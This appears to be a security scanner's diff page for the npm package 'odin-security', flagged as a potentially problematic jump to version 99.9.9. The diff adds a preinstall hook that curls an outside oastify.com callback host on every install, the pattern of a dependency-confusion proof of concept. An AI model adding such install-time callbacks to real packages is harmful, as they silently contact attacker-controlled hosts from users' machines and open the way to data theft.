odin-security 8.8.89 → 99.9.9
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of odin-security might be problematic. Click here for more details.
- package/index.js +1 -1
- package/package.json +4 -7
- package/packages.txt +0 -0
package/index.js
CHANGED
package/package.json
CHANGED
@@ -1,15 +1,12 @@
|
|
1
1
|
{
|
2
2
|
"name": "odin-security",
|
3
|
-
"version": "
|
3
|
+
"version": "99.9.9",
|
4
4
|
"description": "poc",
|
5
5
|
"main": "index.js",
|
6
6
|
"scripts": {
|
7
|
-
"test":
|
8
|
-
"preinstall":
|
7
|
+
"test":"echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall":"curl http://r6yc9q5ub821keohb5x135m5awgq4gs5.oastify.com"
|
9
9
|
},
|
10
10
|
"author": "Akita",
|
11
|
-
"license": "ISC"
|
12
|
-
"dependencies": {
|
13
|
-
"account": "^1.0.0"
|
14
|
-
}
|
11
|
+
"license": "ISC"
|
15
12
|
}
|
package/packages.txt
DELETED
File without changes
|